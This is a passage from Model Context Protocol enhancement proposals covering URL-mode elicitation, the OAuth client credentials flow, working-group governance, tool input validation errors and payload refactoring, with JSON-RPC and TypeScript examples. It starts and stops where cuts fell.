2. External authorization: MCP servers often need to access third-party APIs on behalf of users. The MCP authorization specification only covers client-to-server authorization, not server-to-third-party authorization. The [Security Best Practices](https://modelcontextprotocol.io/specification/2025-06-18/basic/security_best_practices) document explicitly forbids token passthrough, requiring a secure mechanism for external (3rd-party) OAuth flows. This was a particularly important motivating factor emerging from discussions in #234 and #284.
3. Payment and Subscription Flows: Financial transactions require PCI compliance and secure payment processing that cannot be achieved through in-band data collection.
Without a standardized mechanism for these interactions, MCP servers must resort to non-standard workarounds or insecure practices like requesting API keys through in-band, form-style elicitation. This SEP addresses these gaps by introducing a URL elicitation mode that leverages established web security patterns to handle sensitive interactions securely.
URL elicitation is fundamentally different from [MCP authorization](https://modelcontextprotocol.io/specification/2025-06-18/basic/authorization). URL elicitation is not for authorizing the MCP client's access to the MCP server (that's handled directly by MCP authorization). Instead, it's used when the MCP server needs to obtain sensitive information or third-party authorization on behalf of the user. The MCP client's bearer token remains unchanged, and the client's only responsibility is to provide the user with context about the elicitation URL the server wants them to open.
## Specification
### Overview
Elicitation is updated to support two modes:
* **Form mode** (in-band): Servers can request structured data from users with optional JSON schemas to validate responses (no change here, other than adding a name to the existing capability)
* **URL mode** (out-of-band): Servers can direct users to external URLs for sensitive interactions that must not pass through the MCP client
### Capabilities
Clients that support elicitation **MUST** declare the `elicitation` capability during initialization:
```json theme={null}
{
  "capabilities": {
    "elicitation": {
      "form": {},
      "url": {}
    }
  }
}
```
For backwards compatibility, an empty capabilities object is equivalent to declaring support for `form` mode only:
```jsonc theme={null}
{
  "capabilities": {
    "elicitation": {},
  },
}
```
Clients declaring the `elicitation` capability **MUST** support at least one mode (`form` or `url`).
### Form Elicitation Requests
The only change from the existing specification is the addition of a `mode` field in the `elicitation/create` request:
```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "elicitation/create",
  "params": {
    "mode": "form", // New field
    "message": "Please provide your GitHub username",
    "requestedSchema": {
      "type": "object",
      "properties": {
        "name": {
          "type": "string"
        }
      },
      "required": ["name"]
    }
  }
}
```
### URL Elicitation Requests
URL elicitation requests **MUST** specify `mode: "url"` and include these parameters:
| Name | Type | Description |
| --------------- | ------ | ------------------------------------------------------------------ |
| `url` | string | The URL that the user should navigate to. |
| `elicitationId` | string | A unique identifier for the elicitation. |
| `message` | string | A human-readable message explaining why the interaction is needed. |
#### Example: OAuth Authorization Flow
```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 3,
  "method": "elicitation/create",
  "params": {
    "mode": "url",
    "elicitationId": "550e8400-e29b-41d4-a716-446655440000",
    "url": "https://github.com/login/oauth/authorize?client_id=abc123&state=xyz789&scope=repo",
    "message": "Please authorize access to your GitHub repositories to continue."
  }
}
```
#### Response Actions
URL elicitation responses use the same three-action model as form elicitation:
```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 3,
  "result": {
    "action": "accept" // or "decline" or "cancel"
  }
}
```
The response with `action: "accept"` indicates that the user has consented to the interaction. The interaction occurs out of band and the client is not aware of the outcome unless the server sends a completion notification.
#### Completion Notifications
Servers **SHOULD** send a `notifications/elicitation/complete` notification when an out-of-band interaction started by URL mode elicitation is completed. This allows clients to react programmatically if appropriate.
* The notification **MUST** only be sent to the client that initiated the elicitation request.
* The notification **MUST** include the `elicitationId` established in the original `elicitation/create` request.
* Clients **MUST** ignore notifications referencing unknown or already-completed IDs.
* If a completion notification never arrives, clients **SHOULD** provide a manual way for the user to continue the interaction.
Clients **MAY** use the notification to automatically retry requests that received a URL elicitation required error, update the user interface, or otherwise continue an interaction. However, because delivery of the notification is not guaranteed, clients must not wait indefinitely for a notification from the server.
```json theme={null}
{
  "jsonrpc": "2.0",
  "method": "notifications/elicitation/complete",
  "params": {
    "elicitationId": "550e8400-e29b-41d4-a716-446655440000"
  }
}
```
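On the client side, handling this notification can be as simple as keeping a map of pending elicitations keyed by ID. A minimal sketch with hypothetical names:

```typescript theme={null}
// Sketch: client-side bookkeeping for pending URL elicitations.
// `pending` maps an elicitationId to a callback that resumes the interaction.
const pending = new Map<string, () => void>();

function onElicitationComplete(params: { elicitationId: string }) {
  const resume = pending.get(params.elicitationId);
  if (!resume) return; // ignore unknown or already-completed IDs, per above
  pending.delete(params.elicitationId);
  resume(); // e.g. retry a request that failed with a URL elicitation required error
}
```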
#### URL Elicitation Required Error
When a request cannot be processed until an elicitation is completed, the server **MAY** return a `URLElicitationRequiredError` (code `-32042`) to indicate that a URL mode elicitation is required. The server **MUST NOT** return this error except when URL mode elicitation is required by the user interaction.
```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 2,
  "error": {
    "code": -32042,
    "message": "This request requires more information.",
    "data": {
      "elicitations": [
        {
          "mode": "url",
          "elicitationId": "550e8400-e29b-41d4-a716-446655440000",
          "url": "https://oauth.example.com/authorize?client_id=abc123&response_type=code&...",
          "message": "Authorization is required to access your Example Co files."
        }
      ]
    }
  }
}
```
Any elicitations returned in the error **MUST** be URL mode elicitations and include an `elicitationId`.
Returning a `URLElicitationRequiredError` is equivalent to sending an `elicitation/create` request. The server may return an error (instead of sending a separate `elicitation/create` request) as an affordance to the client to make it clear that a particular elicitation is directly related to a failed client request.
The client must treat `URLElicitationRequiredError` responses as equivalent to `elicitation/create` requests. Clients may automatically retry the failed request after the elicitation is completed successfully, for example after receiving a completion notification.
## Rationale
### Design Decisions
**Why extend elicitation instead of creating a new mechanism?**
Initially, we considered creating a separate mechanism for out-of-band interactions (discussed in #475). However, after discussions with the MCP maintainers, we decided to extend the existing elicitation specification because:
1. Both mechanisms serve the same fundamental purpose: gathering information from users
2. Having two similar-but-separate mechanisms for the same purpose is confusing and error-prone
3. The `mode` parameter cleanly separates the two interaction patterns
**Why can't the client perform the interaction itself?**
It is tempting to suggest that the MCP client should perform the interaction itself, e.g. act as an OAuth client to a third-party authorization server. However, there are several reasons why this is not a good idea:
* If the MCP client obtains user tokens from a third-party authorization server, the MCP server becomes a [token passthrough](https://modelcontextprotocol.io/specification/2025-06-18/basic/security_best_practices#token-passthrough) server, which is explicitly forbidden.
* Similarly, for payment-type flows, the MCP client would need to perform PCI-compliant payment processing, which is not a desired requirement for MCP clients.
**Why doesn't the server block (wait) on the elicitation to complete?**
URL mode elicitation requests are asynchronous or "disconnected" flows by design, because the kinds of interactions they enable are inherently asynchronous. Payment flows, external authorization, etc. can take minutes or more to complete, and in some cases never complete at all (if abandoned by the end-user).
**Why disallow URLs in form mode?**
Being very explicit about when URLs can (and cannot) be sent in an elicitation request improves the client's security posture. By clearly stating in the spec that URLs are *only* allowed in the `url` field of a URL mode elicitation request, client implementers can implement UX patterns that are consistent with the security model. For example, a client could refuse to render a URL as a clickable hyperlink in a form mode elicitation request, reducing the likelihood of a user clicking on a malicious URL sent by a malicious server.
### Alternative Approaches Considered
1. **Token Passthrough**: Simply passing the MCP client's token to external services was rejected due to security concerns documented in the Security Best Practices. Having the MCP client obtain additional tokens and passing those to the MCP server was rejected for the same reason.
2. **OAuth-specific Capability**: Creating a capability specific to external (3rd-party) authorization with OAuth was considered, but rejected in favor of the more general URL mode elicitation approach that supports multiple use cases.
### Community Feedback
This proposal incorporates extensive community feedback from discussions in #475, #234, and #284, as well as the #auth-wg working group on Discord. The community identified the need for:
* Secure credential collection without client exposure
* External authorization patterns separate from MCP authorization
* Payment and subscription flow support
* Clear security boundaries and trust models
## Backward Compatibility
This SEP introduces the following breaking changes:
1. **Capability Declaration**: Clients must now specify which elicitation modes they support:
```json theme={null}
{
  "capabilities": {
    "elicitation": {
      "form": {},
      "url": {}
    }
  }
}
```
Previously, clients only declared `"elicitation": {}` without mode specification.
2. **Mode Parameter**: All `elicitation/create` requests must now include a `mode` parameter (`"form"` or `"url"`).
### Migration Path
To ease migration:
* Servers SHOULD check client capabilities before sending mode-specific requests
* Clients MAY initially support only form mode to maintain compatibility
* Existing form elicitation implementations continue to work with the addition of the mode parameter
## Reference Implementation
Client/server implementation in TypeScript: [feat/url-elicitation](https://github.com/modelcontextprotocol/typescript-sdk/compare/main...ArcadeAI:mcp-typescript-sdk:feat/url-elicitation)
Explainer video: [https://drive.google.com/file/d/1llCFS9wmkK\_RUgi5B-zHfUUgy-CNb0n0/view?usp=sharing](https://drive.google.com/file/d/1llCFS9wmkK_RUgi5B-zHfUUgy-CNb0n0/view?usp=sharing)
## Security Implications
This SEP introduces several security considerations:
### URL Security Requirements
1. **SSRF Prevention**: Clients must validate URLs to prevent Server-Side Request Forgery attacks
2. **Protocol Restrictions**: Only HTTPS URLs are allowed for URL elicitation
3. **Domain Validation**: Clients must clearly display target domains to users
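A minimal sketch of these checks, assuming the client receives the URL as an untrusted string:

```typescript theme={null}
// Sketch: validating an elicitation URL before prompting the user.
function validateElicitationUrl(raw: string): URL {
  const url = new URL(raw); // throws on malformed input
  if (url.protocol !== "https:") {
    throw new Error("Only HTTPS URLs are allowed for URL elicitation");
  }
  return url;
}

// The hostname should then be displayed prominently in the consent prompt,
// e.g. `Open ${url.hostname} in your browser?`, before anything is opened.
```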
### Trust Boundaries
URL elicitation explicitly creates clear trust boundaries:
* The MCP client never sees sensitive data obtained by the MCP server via URL elicitation
* The MCP server must independently verify user identity
* Third-party services interact directly with users through secure browser contexts
### Identity Verification
Servers must verify that the user completing a URL elicitation is the same user who initiated the request. Verifying the identity of the user must not rely on untrusted input (e.g. user input) from the client.
### Implementation Requirements
1. **Clients must**:
* Use secure browser contexts that prevent inspection of user inputs
* Validate URLs for SSRF protection
* Obtain explicit user consent before opening URLs
* Clearly display target domains
2. **Servers must**:
* Bind elicitation state to authenticated user sessions
* Verify user identity at the beginning and end of a URL elicitation flow
* Implement appropriate rate limiting
3. **Both parties should**:
* Log security events for audit purposes
* Implement timeout mechanisms for elicitation requests
* Provide clear error messages for security failures
### Relationship to Existing Security Measures
This proposal builds upon and complements existing MCP security measures:
* Works within the existing MCP authorization framework (MCP authorization is not affected by this proposal)
* Follows Security Best Practices regarding token handling
* Maintains separation of concerns between client-server and server-third-party authorization
# SEP-1046: Support OAuth client credentials flow in authorization
Source: https://modelcontextprotocol.io/community/seps/1046-support-oauth-client-credentials-flow-in-authoriza
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1046 |
| **Title** | Support OAuth client credentials flow in authorization |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-23 |
| **Author(s)** | Darin McAdams ([@D-McAdams](https://github.com/D-McAdams)) |
| **Sponsor** | None |
| **PR** | [#1046](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1046) |
***
## Abstract
Recommends adding the OAuth client credentials flow to the authorization spec to enable machine-to-machine scenarios.
## Motivation
The original authorization spec mentioned the client credentials flow, but it was dropped in subsequent revisions. Therefore, the spec is currently silent on how to solve machine-to-machine scenarios where an end-user is unavailable for interactive authorization.
## Specification
The authorization spec would be amended to list the OAuth client credentials flow as being allowed. Adhering to the patterns established by OAuth 2.1, the specification would RECOMMEND the use of asymmetric methods defined in RFC 7523 (JWT Assertions), but also allow client secrets.
As guidance to implementors, the spec overview would also be updated to describe the different flows and when each is applicable. In addition, to address a common question, the spec would be updated to indicate that implementors may implement other authorization scenarios beyond what's defined, emphasizing that the specification defines the baseline requirements.
## Rationale
To maximize interoperability (and minimize SDK complexity), this change would intentionally constrain the client credentials flow to two options:
1. JWT Assertions as per RFC 7523 (RECOMMENDED)
2. Client Secrets via HTTP Basic authentication (Allowed for maximum compatibility with existing systems)
Other options, such as mTLS, are not included.
While the spec encourages the use of RFC 7523 (JWT Assertions), it does not yet specify how to populate the JWT contents nor how to discover the client's JWKS URI to validate the JWT. In future iterations of the spec, it will be beneficial to do so. However, this was currently left unspecified pending maturity of other RFCs that can define these profiles. The other RFCs include [WIMSE Headless JWT Authentication](https://www.ietf.org/archive/id/draft-levy-wimse-headless-jwt-authentication-01.html) (for specifying JWT contents) and [Client ID Metadata](https://datatracker.ietf.org/doc/draft-parecki-oauth-client-id-metadata-document/) (for specifying the JWKS URI). This revision intentionally leaves extensibility for these future profiles. As a practical matter, this means implementers needing to ship solutions ASAP will most likely use client secrets which are widely supported today, whereas the JWT Assertion pattern represents the longer-term direction.
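For illustration, the client-secret variant is the standard OAuth 2.0 client credentials grant over HTTP Basic authentication. A sketch, with a placeholder token endpoint and credentials (nothing here is defined by the MCP specification):

```typescript theme={null}
// Sketch: client credentials grant using a client secret.
async function fetchMachineToken(): Promise<string> {
  const basic = Buffer.from("my-client-id:my-client-secret").toString("base64");
  const res = await fetch("https://auth.example.com/oauth/token", {
    method: "POST",
    headers: {
      "Authorization": `Basic ${basic}`,
      "Content-Type": "application/x-www-form-urlencoded",
    },
    body: new URLSearchParams({ grant_type: "client_credentials" }),
  });
  if (!res.ok) throw new Error(`Token request failed: ${res.status}`);
  const { access_token } = await res.json();
  return access_token; // presented as a Bearer token on MCP requests
}
```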
## Backward Compatibility
This change is fully backward compatible. It introduces a new authorization flow, but does not alter the existing flows.
## Security Implications
The specification refers to the existing OAuth security guidance.
# SEP-1302: Formalize Working Groups and Interest Groups in MCP Governance
Source: https://modelcontextprotocol.io/community/seps/1302-formalize-working-groups-and-interest-groups-in-mc
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1302 |
| **Title** | Formalize Working Groups and Interest Groups in MCP Governance |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-05 |
| **Author(s)** | tadasant |
| **Sponsor** | None |
| **PR** | [#1302](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1302) |
***
## Abstract
*A short (\~200 word) description of the technical issue being addressed.*
In [SEP-994](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1002), we introduced a notion of “Working Groups” and “Interest Groups” that facilitate MCP sub-communities for discussion and collaboration. This SEP aims to formally define those two terms: what they are meant to achieve, how groups can be created, how they are governed, and how they can be retired.
Interest Groups work to define *problems* that MCP should solve by facilitating *discussions*, while Working Groups push forward specific *solutions* by collaboratively producing *deliverables* (in the form of SEPs or community-owned implementations of the specification). Interest Group input is a welcome (but not required) justification for creation of a Working Group. Interest Group or Working Group input is collectively a welcome (but not required) input into a SEP.
## Motivation
*The motivation should clearly explain why the existing protocol specification is inadequate to address the problem that the SEP solves.*
The community has already been self-organizing into several disparate systems for these collaborative groups:
* The Steering group has had a long-standing practice of managing a handful of collaborative groups through Discord channels (e.g. security, auth, agents). See [bottom of MAINTAINERS.md](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md).
* The “CWG Discord” has had a [semi-formal process](https://github.com/modelcontextprotocol-community/working-groups) for pushing equivalent grassroots initiatives, mostly in pursuit of creating artifacts for SEP consideration (e.g. hosting, UI, tool-interfaces, search-tools)
With SEP-994 resulting in the merging of the Discord communities, we have a need to:
* Merge the existing initiatives into one unified approach, so when we reference “working group” or “interest group”, everyone knows what that means and what kind of weight the reference might carry
* Standardize a process around the creation (and eventual retirement) of such groups
* Properly distinguish between “working” and “interest” groups; the CWG experience has shown two very different motivations for starting a group, each worth treating with different expectations and lifecycles. Put succinctly, “interest” groups are about brainstorming possible *problems*, and “working” groups are about pushing forward specific *solutions*.
These groups exist to:
* **Facilitate high signal spaces for discussion** such that those opting into notifications and meetings feel most content is relevant to them and they can meaningfully contribute their experience and learn from others
* **Create norms, expectations, and single points of involved leadership** around making collaborative progress towards concrete deliverables that help evolve MCP
It will also form the foundation for cross-group initiatives, such as maintaining a calendar of live meetings.
## Specification
*The technical specification should describe the syntax and semantics of any new protocol feature. The specification should be detailed enough to allow competing, interoperable implementations. A PR with the changes to the specification should be provided.*
### Interest Groups (IG) \[Problems]
**Goal**: facilitate discussion and knowledge-sharing among MCP community members with similar interests surrounding some MCP sub-topic or context. The focus is on collecting *problems* that may or may not be worth solving with SEPs or other community artifacts.
**Expectations**:
* At least one substantive thread / conversation per month
* AND/OR a live meeting attended by 3+ unaffiliated individuals
**Examples**:
* Security in MCP (currently: #security)
* Auth in MCP (currently: #auth)
* Using MCP in an internal enterprise setting (currently: #enterprise-wg)
* Tooling and practices surrounding hosting MCP servers (currently: #hosting-wg)
* Tooling and practices surrounding implementing MCP clients (currently: #client-implementors)
**Lifecycle**:
* Creation begins by filling out a template in #wg-ig-group-creation Discord channel
* A community moderator will review and call for a vote in the (private) #community-moderators Discord channel. Majority positive vote by members over a 72h period approves creation of the group. Can be reversed at any time (e.g. after more input comes in). Core and lead maintainers can veto.
* Facilitator(s) and Maintainer(s) responsible for organizing IG into meeting expectations
* Facilitator is an informal role responsible for shepherding or speaking for a group
* Maintainer is an official representative from the MCP steering group (not required for every group to have this)
* IG is retired only when community moderators or core+ maintainers decide it is not meeting expectations
* This means successful IGs will live on in perpetuity
**Creation Template**:
* Facilitator(s)
* Maintainer(s) (optional)
* Flag potential overlap with other IGs
* How this IG differentiates itself from the related IGs
* First topic you want to discuss
There is no requirement to be part of an IG to start a WG, or even to start a SEP. However, forming consensus within IGs to justify the creation of a WG is often a good idea. Similarly, citing IG or WG support for a SEP helps the SEP as well.
### Working Groups (WG) \[Solutions]
**Goal**: facilitate MCP community collaboration on a specific SEP, themed series of SEPs, or officially endorsed Project.
**Expectations**:
* Minimum monthly progress towards at least one SEP or spec-related implementation, OR ongoing maintenance responsibilities for a Project
* Facilitator(s) is/are responsible for fielding status update requests by community moderators or maintainers
**Examples**:
* Registry
* Inspector
* Tool Filtering
* Server Identity
**Lifecycle**:
* Creation begins by filling out a template in #wg-ig-group-creation Discord channel
* A community moderator will review and call for a vote in the (private) #community-moderators Discord channel. Majority positive vote by members over a 72h period approves creation of the group. Can be reversed at any time (e.g. after more input comes in). Core and lead maintainers can veto.
* Facilitator(s) and Maintainer(s) responsible for organizing WG into meeting expectations
* Facilitator is an informal role responsible for shepherding or speaking for a group
* Maintainer is an official representative from the MCP steering group (not required for every group to have this)
* WG is retired when either:
* Community moderators or core+ maintainers decide it is not meeting expectations
* The WG does not have a WIP Issue/PR for at least a month, or has completed all Issues/PRs it intends to pursue.
**Creation Template**:
* Facilitator(s)
* Maintainer(s) (optional)
* Explanation of interest/use cases (ideally from an IG but can come from anywhere)
* First Issue/PR/SEP you intend to pursue
### WG/IG Facilitators
A “Facilitator” role in a WG or IG does *not* result in a [maintainership role](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) across the MCP organization. It is an informal role into which anyone can self-nominate, responsible for helping shepherd discussions and collaboration within the group.
Core Maintainers reserve the right to modify the list of Facilitators and Maintainers for any WG/IG at any time.
PR with the documentation changes we would make to enact this SEP: [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1350](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1350)
## Rationale
*The rationale explains why particular design decisions were made. It should describe alternate designs that were considered and related work. The rationale should provide evidence of consensus within the community and discuss important objections or concerns raised during discussion.*
The design above comes from experience in facilitating the creation of, and observing the behavior of, informal “Community Working Groups” in the CWG Discord, and from leading, participating in, and observing the “Steering Committee Working Groups”. While the Steering WGs were usually informally created by Lead Maintainers, the CWG Discord had a lightweight WG-creation process that involved steps similar to the proposal above (community members would propose WGs in #working-group-ideation, and moderators would create channels from that collaboration).
As precedent, the WG and IG concepts here are similar to W3C’s notion of [Working Groups](https://www.w3.org/groups/wg/) and [Interest Groups](https://www.w3.org/groups/ig/).
### Considerations
In proposing the WG/IG design, we took the following into consideration:
#### Clear on-ramp for community involvement
A very common question for folks looking to invest in the MCP ecosystem is, "how do I get involved?"
These IG and WG abstractions help provide an elegant on-ramp:
1. Join the Discord, follow the conversation in IGs relevant to you. Attend live calls. Participate.
2. Offer to facilitate calls. Contribute your use cases in SEP proposals and other work.
3. When you're comfortable contributing to deliverables, jump in to contribute to WG work.
4. Do this for a period of time, get noticed by WG maintainers to get nominated as a new maintainer.
#### Minimal changes to existing governance structure
We did not want this change to introduce new elections, appointments, or other notions of leadership. We leverage community moderators to approve the creation of new groups, allow core maintainers to veto, and keep maintainership status unchanged; the notion of "facilitator" is new but self-nominated, so it does not introduce any new governance processes.
#### Alignment with current status quo
There is a clear "migration" path for the existing "CWG" working groups and Steering working groups - it is just a matter of sorting out what is "working" vs. "interest"; functionally, this proposal avoids changing anything that has been working within each group's existing structure.
#### Nature of requests for gathering spaces
It has been clear from the requests to CWG that some groups form with a motivation to collaborate on some deliverable (e.g. `search-tools`), and others form due to common interests and a want for sub-community but not yet specific deliverables (e.g. `enterprise`). Hence, we separate the motivations into Working Groups vs. Interest Groups.
#### Potential for overlap in scope
In the requests for new group spaces, it is sometimes non-obvious why a new one needs to exist. For example, the stated motivation for `enterprise` at times sounded like it may just be another flavor of `hosting`. We ultimately settled on a distinction that made it clear one was not a direct subset of the other, but the concern of making clear boundaries between groups (and letting community moderators / maintainers centralize the decision-making around "what are the right layers of abstraction") is what led to the creation-template questions such as "flag potential overlap with other IGs".
#### Path to retiring stale groups
Many working groups in the old CWG and Steering models have gone stale since creation. They serve no real purpose and should be retired. For this, we introduce the formal concept of facilitators and optional maintainers in groups; and the community moderator right to retire them. By having at least informal leadership in place per group, a moderator can easily make the decision to retire a group if everyone is in agreement to proceed.
### Alternatives Considered
#### Hierarchy between IGs and WGs
We considered *requiring* that WGs be owned or spawned by a "sponsor" IG, for the purpose of more clearly exhibiting a progression of ideas to the community, but decided against this requirement to avoid adding a new layer of governance and to stay aligned with how the less formal groups work today.
#### A single WG concept (instead of both WG and IG)
There has been regular tension in both CWG and the Steering group around the question of "is XYZ really a working group? how will maintainership work?" By making IGs explicitly discussion-oriented and maintainership involvement optional, we create a space to drive those discussions without requiring a formal expectation of deliverables like we might in a well-defined WG.
#### Free-for-all WG/IG creation process
While very community-driven, the concern of group overlap would quickly fragment the conversations and collaboration to an untenable level; we need a centralized point of discernment here.
## Backward Compatibility
*All SEPs that introduce backward incompatibilities must include a section describing these incompatibilities and their severity. The SEP must explain how the author proposes to deal with these incompatibilities.*
There is no major change suggested to the day-to-day of existing groups - the expectations laid out for IGs and WGs are easily met by existing active groups as long as they keep doing what they are doing.
A migration path for all groups is laid out below.
## Reference Implementation
*The reference implementation must be completed before any SEP is given status “Final”, but it need not be completed before the SEP is accepted. While there is merit to the approach of reaching consensus on the specification and rationale before writing code, the principle of “rough consensus and running code” is still useful when it comes to resolving many discussions of protocol details.*
The below is the suggested migration path for each group. "Migration" just involves acknowledgement of this SEP and the expectations of each group, plus methodology for possible eventual retirement (or immediate retirement, in some cases).
After this SEP is approved, we can ping each of the groups to confirm they are on board with the migration plan.
### Steering Working Groups
* All official SDK groups --> Working Groups
* Registry --> Working Group
* Documentation --> Working Group
* Inspector --> Working Group
* Auth --> Interest Group + some WGs: client-registration, improve-devx, profiles, tool-scopes
* Agents --> Working Group \[Long Running / Async Tool Calls; unless we want an Agents IG on top of that?]
* Connection Lifetime --> Retire
* Streaming --> Retire
* Spec Compliance --> Retire (good idea but stale; would be good for someone to spearhead a new Working Group)
* Security --> Interest Group (perhaps with Security Best Practices WG?)
* Transports --> Interest Group
* Server Identity --> Working Group
* Governance --> Working Group (or Retire if no more work here?)
### Community Working Groups
* agent-comms --> Retire
* enterprise --> Interest Group (request a proposal to start)
* hosting --> Interest Group (request a proposal to start)
* load-balancing --> Retire
* model-awareness --> Working Group (request a proposal to start)
* search-tools (tool-filtering) --> Working Group
* server-identity --> merge with Steering equivalent
* security --> merge with Steering equivalent
* tool-interfaces --> Retire
* ui --> Interest Group
* schema-validation --> Retire (same as Steering equivalent)
# SEP-1303: Input Validation Errors as Tool Execution Errors
Source: https://modelcontextprotocol.io/community/seps/1303-input-validation-errors-as-tool-execution-errors
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1303 |
| **Title** | Input Validation Errors as Tool Execution Errors |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-05 |
| **Author(s)** | [@fredericbarthelet](https://github.com/fredericbarthelet) |
| **Sponsor** | None |
| **PR** | [#1303](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1303) |
***
## Abstract
This SEP proposes treating tool input validation errors as Tool Execution Errors rather than Protocol Errors. This change would enable language models to receive validation error feedback in their context window, allowing them to self-correct and successfully complete tasks without human intervention, significantly improving task completion rates.
## Motivation
Language models can learn from tool input validation error messages and retry a tools/call with corrected parameters, but only if they receive the error feedback in their context window. Protocol Errors are caught at the application level by the MCP client; only Tool Execution Errors are forwarded back to the model in tool results. With the current specification, models cannot see these error messages and thus cannot self-correct, leading to repeated failures and poor user experiences.
### Problem Statement
Consider a flight booking tool that validates departure dates using the following `zod` validation schema:
```typescript theme={null}
departureDate: z.string()
  .regex(/^\d{2}\/\d{2}\/\d{4}$/, "date must be in dd/mm/yyyy format")
  .superRefine((dateStr, ctx) => {
    const date = parseDateFr(dateStr);
    if (date.getTime() < Date.now()) {
      ctx.addIssue({
        code: z.ZodIssueCode.custom,
        message:
          "Dates must be in the future. Current date is " +
          formatDateFr(new Date()),
      });
    }
    return true;
  })
  .describe("Departure date in dd/mm/yyyy format");
```
The tool's expected input JSON Schema can only describe the regex constraint. The programmatic check that rejects past dates cannot be expressed in JSON Schema.
Even when a model provides a syntactically correct date that passes JSON schema validation, there is no guarantee it will be in the future. When a validation error is raised and returned as a Protocol Error:
1. The model doesn't receive the error message explaining why the date was rejected
2. The model repeats the same mistake multiple times (e.g., Cursor consistently sends dates in 2024 when the user specifies only a day and month or a relative date, and repeats the same tools/call request three times without getting any information as to why the call fails)
3. The task fails despite the model being capable of correcting itself if given proper feedback
4. Users experience frustration and must manually intervene
### Benefits of This Proposal
1. **Higher Task Completion Rates**: Models can self-correct validation errors without human intervention
2. **Better User Experience**: Reduced failures and faster task completion
3. **Leverages Model Capabilities**: Modern LLMs excel at understanding and responding to error messages
4. **Reduced API Calls**: Fewer retry attempts as models correct themselves on the first error
## Specification
### Current Behavior
The [tool errors specification](https://modelcontextprotocol.io/specification/2025-06-18/server/tools#error-handling) currently provides ambiguous guidance:
* "Invalid arguments" should be treated as Protocol Error
* "Invalid input data" should be treated as Tool Execution Error
This ambiguity leads to inconsistent implementations where valuable error feedback is lost.
### Proposed Change
Clarify the specification with the following changes:
1. Remove the "invalid argument" category from **Protocol Errors**.
2. Use **Tool Execution Errors** for all tool argument validation failures (merging `invalid argument` and `invalid input data` under a new `input validation errors` category)
### Specification Text Changes
Update the error handling section to include:
```
## Error Handling

Tools use two error reporting mechanisms:

1. **Protocol Errors**: Standard JSON-RPC errors for issues like:
   - Unknown tools
   - Server errors

2. **Tool Execution Errors**: Reported in tool results with `isError: true`:
   - API failures
   - Input validation errors
   - Business logic errors
```
## Implementation
### Before (Protocol Error)
```typescript theme={null}
// Model submits past date
request: {
  ...
  method: "tools/call",
  params: {
    name: "book_flight",
    arguments: {
      departureDate: "12/12/2024" // Past date
    }
  }
}

// Server returns Protocol Error
response: {
  ...
  error: {
    code: -32602,
    message: "Invalid params"
  }
}

// Model retries blindly with another past date
// This cycle repeats until failure
```
### After (Tool Execution Error)
```typescript theme={null}
// Model submits past date
request: {
  ...
  method: "tools/call",
  params: {
    name: "book_flight",
    arguments: {
      departureDate: "12/12/2024" // Past date
    }
  }
}

// Server returns Tool Execution Error (visible to model)
response: {
  ...
  "result": {
    "content": [
      {
        "type": "text",
        "text": "Dates must be in the future. Current date is 08/08/2025"
      }
    ],
    "isError": true
  }
}

// Model understands the error and corrects itself
request: {
  method: "tools/call",
  params: {
    name: "book_flight",
    arguments: {
      departureDate: "12/12/2025" // Future date
    }
  }
}
```
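Server-side, adopting this behavior typically means catching validation failures inside the tool handler and converting them into `isError: true` results. A minimal sketch, assuming a `zod`-validated handler (the booking logic itself is elided):

```typescript theme={null}
import { z, ZodError } from "zod";

const bookFlightInput = z.object({
  departureDate: z.string().regex(/^\d{2}\/\d{2}\/\d{4}$/),
});

async function callBookFlight(args: unknown) {
  try {
    const input = bookFlightInput.parse(args);
    // ... perform the booking with the validated input ...
    return { content: [{ type: "text", text: "Flight booked." }] };
  } catch (err) {
    if (err instanceof ZodError) {
      // Surface the validation messages so the model can self-correct.
      return {
        content: [
          { type: "text", text: err.issues.map((i) => i.message).join("; ") },
        ],
        isError: true,
      };
    }
    throw err; // unexpected failures remain protocol-level errors
  }
}
```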
## Backwards Compatibility
This change is backwards compatible as it:
* Does not alter the protocol structure
* Only clarifies existing ambiguous behavior
* Maintains all existing error types and formats
* Improves behavior without breaking existing implementations
Servers implementing the clarified behavior will provide better model self-recovery while continuing to work with all existing clients.
## References
* [MCP Tools Error Handling Specification](https://modelcontextprotocol.io/specification/2025-06-18/server/tools#error-handling)
* [Better MCP tools/call Error Responses: Help Your AI Recover Gracefully](https://dev.to/alpic/better-mcp-toolscall-error-responses-help-your-ai-recover-gracefully-15c7)
* Related Issue: [https://github.com/modelcontextprotocol/typescript-sdk/pull/824](https://github.com/modelcontextprotocol/typescript-sdk/pull/824)
# SEP-1319: Decouple Request Payload from RPC Methods Definition
Source: https://modelcontextprotocol.io/community/seps/1319-decouple-request-payload-from-rpc-methods-definiti
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1319 |
| **Title** | Decouple Request Payload from RPC Methods Definition |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-08 |
| **Author(s)** | [@kurtisvg](https://github.com/kurtisvg) |
| **Sponsor** | None |
| **PR** | [#1319](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1319) |
***
## Abstract
This SEP proposes a structural refactoring of the Model Context Protocol (MCP) specification. The core change is to define request payloads (e.g., CallToolRequest) as independent definitions and have the RPC method definitions refer to these models. This decouples the definition of the data payload from the definition of the remote procedure that transports it, leading to a clearer, more modular, and more maintainable specification.
## Motivation
The current MCP specification tightly couples the data payload of a request with the JSON-RPC method that transports it. This design presents several challenges:
